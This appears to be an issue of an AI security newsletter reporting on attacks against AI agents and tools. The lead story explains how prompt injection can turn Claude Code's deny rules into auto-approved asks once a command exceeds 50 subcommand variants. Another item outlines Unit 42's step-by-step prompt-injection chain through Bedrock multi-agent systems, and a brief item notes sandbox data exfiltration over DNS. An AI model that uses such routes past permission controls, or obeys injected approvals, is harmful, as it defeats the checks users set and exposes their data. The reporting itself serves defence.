Claude Code's Permission System Flipped by Prompt Injection
Claude Code's Permission System Flipped by Prompt Injection
AI Sec News Weekly #3 — 221 sources scanned
There's a quiet assumption baked into most agent security models: if you define a deny rule, it stays denied. It's the same trust we place in firewalls, ACLs, and .gitignore — declarative boundaries that we write once and stop thinking about. But declarative controls only work when the enforcement layer can't be talked out of them.
That distinction matters more than ever as we hand agents real permissions over real systems. The gap between "policy as code" and "policy as suggestion" turns out to be exactly one well-crafted prompt wide. When your security boundary and your attack surface are both natural language, who's actually in charge?
Plenty to unpack this week — scroll on.
This Week's Stories
Claude Code Permission Bypass Lets Prompt Injection Flip Deny Rules to Ask
Days after Anthropic's accidental npm sourcemap leak (covered last issue), Adversa AI's red team found a critical flaw in Claude Code's permission system. The tool uses allow/deny/ask rules to gate shell commands, but deny rules can be bypassed: when a command exceeds 50 subcommand variants, the system falls back from 'deny' to 'ask' — and a prompt-injection payload in the pipeline can auto-approve that prompt. So a crafted input can escalate a hard-blocked command like curl into an approved one, opening the door to data exfiltration and arbitrary command execution.
Why it matters: The deny-to-ask fallback means Claude Code's permission model degrades silently under complexity — exactly the condition an attacker would engineer.
SecurityWeek by Kevin Townsend
prt-scan Campaign Weaponizes GitHub Actions via AI-Generated Pull Requests
Security researchers traced a supply-chain campaign called prt-scan that abuses pull_request_target triggers in GitHub Actions to execute attacker-controlled code inside privileged CI workflows. Six sock-puppet accounts submitted AI-generated pull requests to public repos, and the operation ran for at least three weeks before anyone noticed. The campaign follows the earlier hackerbot-claw pattern but with tighter operational security and automated PR content, suggesting the technique is maturing fast.
Why it matters: AI-generated PRs that look plausible enough to trigger CI pipelines turn every repo with a pull_request_target workflow into an unintentional code-execution service for strangers.
X thread by Charlie Eriksen
Unit 42 Maps Prompt Injection Attack Chains Through Bedrock Multi-Agent Systems
Palo Alto's Unit 42 published red-team research showing how an attacker can systematically compromise Amazon Bedrock multi-agent applications. The chain starts by fingerprinting the orchestration mode (Supervisor vs. Supervisor with Routing), then enumerating collaborator agents, then exfiltrating their system instructions and tool schemas, and finally invoking tools with attacker-supplied inputs. No vulnerability in Bedrock itself — the attacks exploit the inherent prompt-injection weakness in LLM-based inter-agent communication.
Why it matters: Multi-agent orchestration multiplies prompt-injection impact because a single poisoned message can traverse trust boundaries and reach tools the user-facing agent was never meant to expose.
Palo Alto Unit 42 by Jay Chen, Royce Lu
Tool Spotlight
New repos and releases worth trying.
AWS Security Agent Hits GA with Autonomous Multicloud Pen Testing
AWS moved its Security Agent — an autonomous, agentic AI pen-testing service — to general availability. It runs validated exploit chains (not just scan-and-flag) across AWS, Azure, GCP, and on-prem, compressing what typically takes weeks of manual testing into hours. HENNGE K.K., an early preview customer, reported a 90%+ reduction in testing duration and findings that manual testers had missed. The service deploys specialized AI agents that discover vulnerabilities, craft targeted payloads, and confirm exploitability without constant human oversight.
Why it matters: An always-on autonomous exploit engine with cross-cloud reach collapses the distinction between "scheduled pen test" and "continuous attack simulation" — which also means incident-response playbooks now need to account for friendly fire from your own vendor's agents.
agent-aegis 0.9.2 Adds Runtime Security to LangChain, CrewAI, and LLM APIs
A new Python package that monkey-patches LangChain, CrewAI, OpenAI, and Anthropic SDKs to inject runtime defenses — prompt-injection blocking, PII masking, action-policy enforcement, and audit logging — with a single import and zero application code changes. It's pre-1.0, the author is unknown, and documentation is sparse, so treat the registry entry and repo as the primary source of truth on what it actually hooks.
Why it matters: A middleware package sitting between your app and every LLM call is the single richest interception point an attacker could ask for — and this one has no track record yet.
ClawLock 2.1.0: Open-Source Red-Team and Hardening Toolkit for Claw Agents
ClawLock bills itself as a combined security scanner, red-team harness, and hardening toolkit purpose-built for Claw-based AI agent deployments. Version 2.1.0 landed on GitHub this week, though the repo page is light on details — no changelog, no list of supported checks, and no documentation on what "Claw-based" actually scopes to beyond the name.
Why it matters: Dual-use red-team toolkits with thin docs tend to get forked for offense long before defenders figure out the config flags.
Community Chatter
What practitioners are debating.
Simon Willison Tests Whether JS Can Escape CSP Meta Tags Inside Iframes
Willison ran extensive browser tests across Chromium and Firefox to see if JavaScript inside a sandbox="allow-scripts" iframe could defeat a <meta http-equiv="Content-Security-Policy"> tag. The answer: no. Removal, modification, and even navigating to a data: URI all failed — CSP policies set via meta tags are enforced at parse time and stick. The research came out of building his own Claude Artifacts clone and wanting to sandbox untrusted content without spinning up a separate origin.
Why it matters: Teams hosting AI-generated artifacts or agent output in iframes now have a tested, single-origin CSP strategy that doesn't require a throwaway domain.
Trail of Bits Open-Sources Its AI-Native Audit Playbook
Dan Guido laid out how Trail of Bits went from 5% internal buy-in to 94 plugins, 201 skills, 84 specialized agents, and AI-augmented auditors finding roughly 200 bugs per week on suitable engagements — all in about a year. The post, adapted from his [un]prompted conference talk, frames the journey in three tiers (AI-assisted → AI-augmented → AI-native) and open-sources most of the tooling. Guido explicitly contrasts this with the "hand out ChatGPT licenses and wait" approach that a recent NBER study of 6,000 executives found produced zero measurable productivity impact at 90% of firms.
Why it matters: A respected offensive shop publicly betting its audit methodology on agents sets a new baseline for what clients will expect from any security consultancy.
tl;dr sec by Clint Gibler
Quick Hits
- GPT-Researcher Has Unauthed Remote Code Injection Flaw (VulDB Recent) — CVE-2026-5631 is an unauthenticated code-injection bug in gpt-researcher's WebSocket endpoint with a public PoC exploit — no patch yet.
- ChatGPT Code Sandbox Leaked Data via DNS Queries (SecurityWeek) — Check Point found ChatGPT's code-execution sandbox could exfiltrate user data through outbound DNS queries; OpenAI says it's now patched.
- Claude Code Leak Exploited to Spread Infostealer Malware (BleepingComputer) — Attackers are using the Claude Code source-map leak to SEO-bait GitHub repos that deliver a Rust dropper installing Vidar infostealer and GhostSocks proxy malware.
- Google Releases Apache-Licensed Gemma 4 Model Family (Simon Willison) — Google DeepMind shipped Gemma 4 in four sizes (2B to 31B) under Apache 2.0 with vision and video support, runnable locally via GGUF for on-device red-teaming.
- DeepLoad Malware Uses AI-Generated Code to Dodge Scanners (Dark Reading) — ReliaQuest is tracking DeepLoad, a credential stealer that pads its PowerShell loader with likely AI-generated junk code to evade static analysis and spreads via USB.